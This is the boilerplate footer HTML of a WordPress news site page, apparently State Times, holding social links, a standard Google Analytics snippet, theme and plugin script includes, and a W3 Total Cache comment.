                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x28364'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x28364'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x28364'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"d4153405a6","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x28364'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x28364'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x28364'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x28364'></script>
    <script>document.addEventListener("DOMContentLoaded",function() {if (typeof LazyLoad !== "undefined") {window.w3tc_lazyload=new LazyLoad(window.lazyLoadOptions)}})</script></body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Object Caching 226/255 objects using disk
Page Caching using disk: enhanced 
Lazy Loading
Database Caching using disk

Served from: news.statetimes.in @ 2020-03-19 11:45:37 by W3 Total Cache
-->